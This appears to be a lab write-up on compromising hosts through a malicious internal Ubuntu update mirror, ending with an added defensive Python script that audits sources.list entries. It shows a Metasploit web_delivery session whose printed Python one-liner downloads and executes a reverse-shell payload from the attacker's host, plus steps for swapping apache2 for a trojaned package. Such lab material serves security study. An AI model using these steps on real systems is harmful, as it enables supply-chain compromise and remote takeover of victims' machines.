deb http://archive.ubuntu.com/ubuntu kinetic main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu kinetic-security main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu kinetic-updates main restricted universe multiverse
#deb http://archive.ubuntu.com/ubuntu kinetic-proposed main restricted universe multiverse
#deb http://archive.ubuntu.com/ubuntu kinetic-backports main restricted universe multiverse

deb-src http://archive.ubuntu.com/ubuntu kinetic main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu kinetic-security main restricted universe multiverse
deb-src http://archive.ubuntu.com/ubuntu kinetic-updates main restricted universe multiverse
#deb-src http://archive.ubuntu.com/ubuntu kinetic-proposed main restricted universe multiverse
#deb-src http://archive.ubuntu.com/ubuntu kinetic-backports main restricted universe multiverse

deb http://archive.ubuntu.com/ubuntu focal main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal-security main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal-updates main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal-proposed main restricted universe multiverse
deb http://archive.ubuntu.com/ubuntu focal-backports main restricted universe multiverse

deb http://<your-server-IP>/ubuntu focal main restricted universe multiverse
deb http://<your-server-IP>/ubuntu focal-security main restricted universe multiverse
deb http://<your-server-IP>/ubuntu focal-updates main restricted universe multiverse
deb http://<your-server-IP>/ubuntu focal-proposed main restricted universe multiverse
deb http://<your-server-IP>/ubuntu focal-backports main restricted universe multiverse
My update source server's IP is 192.168.31.117, so the update source on the other intranet hosts is configured as:
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show options

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (python/meterpreter/reverse_tcp):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Python

View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > set lhost 192.168.31.71
lhost => 192.168.31.71
msf6 exploit(multi/script/web_delivery) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.31.71:4444
[*] Using URL: http://192.168.31.71:8080/zQqeWQAQbo8cSb
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.31.71:8080/zQqeWQAQbo8cSb', context=ssl._create_unverified_context());exec(r.read());"
msf6 exploit(multi/script/web_delivery) >
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse
8) Install apache2 and watch whether Kali receives a shell

sudo apt update
sudo apt install apache2

Shell obtained successfully
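II. Bypassing verification directly
This part is the more interesting, newly discovered material.
First, we restore both the update source server and the victim host to their snapshots.
1) Set up the malicious update source
Replace the official original apache2 with the malicious package
2) Configure the victim host to use this update source
Configure the victim host to use the update source we set up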
deb http://192.168.31.117/ubuntu focal main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-security main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-updates main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-backports main restricted universe multiverse
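
From the defender's side, the client configuration shown above is something to audit for. The following is an added example, not part of the original post: it parses one-line-style sources.list entries and flags active ones whose mirror host is not on an approved list, that carry options relaxing signature verification, or that enable the -proposed pocket. The APPROVED_HOSTS allow-list, the sample text and the host mirror.example.internal are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this organisation has approved as APT mirrors.
APPROVED_HOSTS = {"archive.ubuntu.com", "security.ubuntu.com"}
# sources.list(5) options that relax or disable repository signature checks.
RISKY_OPTIONS = {"trusted": "yes", "allow-insecure": "yes",
                 "allow-weak": "yes", "allow-downgrade-to-insecure": "yes"}
ENTRY = re.compile(r"^(deb|deb-src)\s+(?:\[([^\]]*)\]\s+)?(\S+)\s+(\S+)(?:\s+(.*))?$")

def audit_sources(text):
    """Return (line_no, finding) tuples for active one-line-style entries."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # commented-out entries are inactive
        if not line:
            continue
        m = ENTRY.match(line)
        if not m:
            findings.append((no, "unparseable entry"))
            continue
        _type, opts, uri, suite, _components = m.groups()
        host = urlparse(uri).hostname
        if host not in APPROVED_HOSTS:
            findings.append((no, f"unapproved mirror host {host}"))
        for opt in (opts or "").split():
            key, _, value = opt.partition("=")
            if RISKY_OPTIONS.get(key.lower()) == value.lower():
                findings.append((no, f"signature check relaxed by {opt}"))
        if suite.endswith("-proposed"):
            findings.append((no, "pre-release -proposed pocket enabled"))
    return findings

# Constructed sample: entries in the page's format plus one constructed entry
# that carries options (mirror.example.internal is a placeholder host).
SAMPLE = """\
deb http://archive.ubuntu.com/ubuntu focal main restricted universe multiverse
#deb http://archive.ubuntu.com/ubuntu kinetic-proposed main restricted universe multiverse
deb http://192.168.31.117/ubuntu focal-proposed main restricted universe multiverse
deb [arch=amd64 trusted=yes] https://mirror.example.internal/ubuntu focal main
"""

if __name__ == "__main__":
    for no, finding in audit_sources(SAMPLE):
        print(f"line {no}: {finding}")
```

On a real host, feed it the contents of /etc/apt/sources.list and each file under /etc/apt/sources.list.d/ that uses the one-line format.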